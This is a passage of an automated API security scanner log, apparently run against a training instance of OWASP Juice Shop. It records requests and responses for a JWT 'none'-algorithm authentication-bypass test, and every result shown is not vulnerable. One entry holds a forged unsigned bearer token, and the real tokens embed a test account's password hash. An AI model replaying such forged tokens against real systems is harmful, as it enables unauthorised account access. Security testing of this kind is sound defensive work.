<a href=\"https://github.blog/2020-07-16-github-archive-program-the-journey-of-the-worlds-open-source-code-to-the-arctic\">Arctic Code Vault</a> on July 8. 2020 where it will be safely stored for at least 1000 years.","price":9999.99,"quantity":1,"limitPerUser":1,"image":"permafrost.jpg","reviews":[{"text":"🧊 Let it go, let it go 🎶 Can't hold it back anymore 🎶 Let it go, let it go 🎶 Turn away and slam the door ❄️","author":"rapper"}]},{"name":"Best Juice Shop Salesman Artwork","description":"Unique digital painting depicting Stan, our most qualified and almost profitable salesman. He made a succesful carreer in selling used ships, coffins, krypts, crosses, real estate, life insurance, restaurant supplies, voodoo enhanced asbestos and courtroom souvenirs before <em>finally</em> adding his expertise to the Juice Shop marketing team.","price":5000,"quantity":1,"image":"artwork2.jpg","reviews":[{"text":"I'd stand on my head to make you a deal for this piece of art.","author":"stan"},{"text":"Just when my opinion of humans couldn't get any lower, along comes Stan...","author":"bender"}]},{"name":"OWASP Juice Shop Card (non-foil)","description":"Mythic rare <small><em>(obviously...)</em></small> card \"OWASP Juice Shop\" with three distinctly useful abilities. Alpha printing, mint condition. A true collectors piece to own!","price":1000,"quantity":3,"limitPerUser":1,"image":"card_alpha.jpg","reviews":[{"text":"DO NOT PLAY WITH THIS! Double-sleeve, then put it in the GitHub Arctic Vault for perfect preservation and boost of secondary market value!","author":"accountant"}]},{"name":"20th Anniversary Celebration Ticket","description":"Get your <a href=\"https://20thanniversary.owasp.org/\" target=\"_blank\">free 🎫 for OWASP 20th Anniversary Celebration</a> online conference! Hear from world renowned keynotes and special speakers, network with your peers and interact with our event sponsors. With an anticipated 10k+ attendees from around the world, you will not want to miss this live on-line event!","price":1e-20,"deletedDate":"2021-09-25","limitPerUser":1,"image":"20th.jpeg","reviews":[{"text":"I'll be there! Will you, too?","author":"bjoernOwasp"}]}],"memories":[{"image":"magn(et)ificent!-1571814229653.jpg","caption":"Magn(et)ificent!","user":"bjoernGoogle"},{"image":"my-rare-collectors-item!-[̲̅$̲̅(̲̅-͡°-͜ʖ-͡°̲̅)̲̅$̲̅]-1572603645543.jpg","caption":"My rare collectors item! [̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]","user":"bjoernGoogle"},{"image":"favorite-hiking-place.png","caption":"I love going hiking here...","geoStalkingMetaSecurityQuestion":14,"geoStalkingMetaSecurityAnswer":"Daniel Boone National Forest"},{"image":"IMG_4253.jpg","caption":"My old workplace...","geoStalkingVisualSecurityQuestion":10,"geoStalkingVisualSecurityAnswer":"ITsec"}],"ctf":{"showFlagsInNotifications":false,"showCountryDetailsInNotifications":"none","countryMapping":null}}}
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/rest/admin/application-version GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"14-JACOtdv7oa4TZ1UQUABVYqTiWE0\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"20","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
{"version":"14.5.1"}
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/rest/basket/6 GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"9a-7pRt+YYYtpn/FKWwZhab5poRD+E\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"154","Date":"Thu, 09 Mar 2023 14:50:30 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":{"id":6,"coupon":null,"UserId":21,"createdAt":"2023-03-09T14:50:29.996Z","updatedAt":"2023-03-09T14:50:29.996Z","Products":[]}}

Attempted request : {url=https://juiceshop.akto.io/rest/basket/6, method=GET, type=HTTP/1.1, queryParams=null, body=, headers={"sec-fetch-mode":"cors","sec-fetch-site":"same-origin","cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","accept-language":"en-GB,en-US;q=0.9,en;q=0.8","x-akto-ignore":"0","accept":"application/json, text/plain, */*","authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","host":"juiceshop.akto.io","connection":"close","accept-encoding":"gzip, deflate","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","sec-fetch-dest":"empty"}}

Attempted response: {statusCode=401.0, body={"status":"error","message":{}}, headers={"date":"Fri, 29 Sep 2023 08:58:25 GMT","access-control-allow-origin":"*","content-length":"31","x-content-type-options":"nosniff","x-recruiting":"/#/jobs","vary":"Accept-Encoding","x-frame-options":"SAMEORIGIN","content-type":"application/json; charset=utf-8","etag":"W/\"1f-Sc96etNbljMus8t9iaktsJ/FpRk\"","feature-policy":"payment 'self'"}}


 ------------------------------------ 

API: https://juiceshop.akto.io/rest/captcha/ GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"32-vqgZNWxKAaJR+BtU04LY7YgnXPg\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"50","Date":"Thu, 09 Mar 2023 14:51:03 GMT","Content-Type":"application/json; charset=utf-8"}
{"captchaId":0,"captcha":"10-10*9","answer":"-80"}
Attempted errors : 
Error 1: Request API failed authentication check, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/rest/languages GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"1232-ea+p0aX8IZishpw0BcROMCIZiVI\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"4658","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
[{"key":"az_AZ","lang":"Azərbaycanca","icons":["az"],"shortKey":"AZ","percentage":91.34615384615384,"gauge":"full"},{"key":"id_ID","lang":"Bahasa Indonesia","icons":["id"],"shortKey":"ID","percentage":34.855769230769226,"gauge":"quarter"},{"key":"ca_ES","lang":"Catalan","icons":["es-ct"],"shortKey":"CA","percentage":19.71153846153846,"gauge":"empty"},{"key":"cs_CZ","lang":"Česky","icons":["cz"],"shortKey":"CS","percentage":94.95192307692307,"gauge":"full"},{"key":"da_DK","lang":"Dansk","icons":["dk"],"shortKey":"DA","percentage":95.4326923076923,"gauge":"full"},{"key":"de_DE","lang":"Deutsch","icons":["de"],"shortKey":"DE","percentage":96.39423076923077,"gauge":"full"},{"key":"et_EE","lang":"Eesti","icons":["ee"],"shortKey":"ET","percentage":94.95192307692307,"gauge":"full"},{"key":"en","icons":["gb","us"],"shortKey":"EN","lang":"English","percentage":100,"gauge":"full"},{"key":"es_ES","lang":"Español","icons":["es"],"shortKey":"ES","percentage":95.1923076923077,"gauge":"full"},{"key":"fr_FR","lang":"Français","icons":["fr"],"shortKey":"FR","percentage":95.91346153846155,"gauge":"full"},{"key":"ga_IE","lang":"Gaeilge","icons":["ie"],"shortKey":"GA","percentage":0.7211538461538461,"gauge":"empty"},{"key":"it_IT","lang":"Italiano","icons":["it"],"shortKey":"IT","percentage":38.70192307692308,"gauge":"quarter"},{"key":"pl_PL","lang":"Język Polski","icons":["pl"],"shortKey":"PL","percentage":43.269230769230774,"gauge":"quarter"},{"key":"lv_LV","lang":"Latvijas","icons":["lv"],"shortKey":"LV","percentage":35.57692307692308,"gauge":"quarter"},{"key":"hu_HU","lang":"Magyar","icons":["hu"],"shortKey":"HU","percentage":12.259615384615383,"gauge":"empty"},{"key":"nl_NL","lang":"Nederlands","icons":["nl"],"shortKey":"NL","percentage":89.66346153846155,"gauge":"three-quarters"},{"key":"no_NO","lang":"Norsk","icons":["no"],"shortKey":"NO","percentage":86.53846153846155,"gauge":"three-quarters"},{"key":"pt_PT","lang":"Português","icons":["pt"],"shortKey":"PT","percentage":83.17307692307693,"gauge":"three-quarters"},{"key":"pt_BR","lang":"Português (Brasil)","icons":["br"],"shortKey":"BR","percentage":96.15384615384616,"gauge":"full"},{"key":"ru_RU","lang":"Pусский","icons":["ru"],"shortKey":"RU","percentage":98.79807692307693,"gauge":"full"},{"key":"ro_RO","lang":"Română","icons":["ro"],"shortKey":"RO","percentage":97.11538461538461,"gauge":"full"},{"key":"de_CH","lang":"Schwizerdütsch","icons":["ch"],"shortKey":"CH","percentage":96.63461538461539,"gauge":"full"},{"key":"fi_FI","lang":"Suomalainen","icons":["fi"],"shortKey":"FI","percentage":84.61538461538461,"gauge":"three-quarters"},{"key":"sv_SE","lang":"Svenska","icons":["se"],"shortKey":"SV","percentage":56.00961538461539,"gauge":"half"},{"key":"tr_TR","lang":"Türkçe","icons":["tr"],"shortKey":"TR","percentage":61.29807692307693,"gauge":"half"},{"key":"el_GR","lang":"Ελληνικά","icons":["gr"],"shortKey":"EL","percentage":44.230769230769226,"gauge":"quarter"},{"key":"bg_BG","lang":"български (език)","icons":["bg"],"shortKey":"BG","percentage":35.81730769230769,"gauge":"quarter"},{"key":"uk_UA","lang":"український","icons":["ua"],"shortKey":"UA","percentage":0.2403846153846154,"gauge":"empty"},{"key":"ka_GE","lang":"ქართული","icons":["ge"],"shortKey":"KA","percentage":35.33653846153847,"gauge":"quarter"},{"key":"he_IL","lang":"עברית","icons":["il"],"shortKey":"HE","percentage":64.90384615384616,"gauge":"half"},{"key":"ar_SA","lang":"عربي","icons":["ae","tn"],"shortKey":"AR","percentage":79.5673076923077,"gauge":"three-quarters"},{"key":"hi_IN","lang":"हिंदी","icons":["in"],"shortKey":"HI","percentage":35.57692307692308,"gauge":"quarter"},{"key":"si_LK","lang":"සිංහල","icons":["si"],"shortKey":"SI","percentage":2.403846153846154,"gauge":"empty"},{"key":"th_TH","lang":"ไทย","icons":["th"],"shortKey":"TH","percentage":74.27884615384616,"gauge":"three-quarters"},{"key":"my_MM","lang":"ျမန္မာ","icons":["mm"],"shortKey":"MY","percentage":20.673076923076923,"gauge":"empty"},{"key":"ko_KR","lang":"한국어","icons":["kr"],"shortKey":"KO","percentage":53.605769230769226,"gauge":"half"},{"key":"zh_CN","lang":"中文","icons":["cn"],"shortKey":"CN","percentage":99.51923076923077,"gauge":"full"},{"key":"ja_JP","lang":"日本語","icons":["jp"],"shortKey":"JA","percentage":99.03846153846155,"gauge":"full"},{"key":"zh_TW","lang":"繁體中文","icons":["tw"],"shortKey":"TW","percentage":99.27884615384616,"gauge":"full"},{"key":"zh_HK","lang":"繁體中文","icons":["hk"],"shortKey":"HK","percentage":31.009615384615387,"gauge":"quarter"}]
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/rest/products/24/reviews PUT
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Origin":"https://juiceshop.akto.io","Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8","Content-Length":"52","Content-Type":"application/json"}
{"message":"good apple","author":"victim@gmail.com"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"14-Y53wuE/mmbSikKcT/WualL1N65U\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"20","Date":"Thu, 09 Mar 2023 14:50:55 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success"}
Attempted errors : 
Error 1: Request API failed authentication check, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/rest/products/INTEGER/reviews GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) 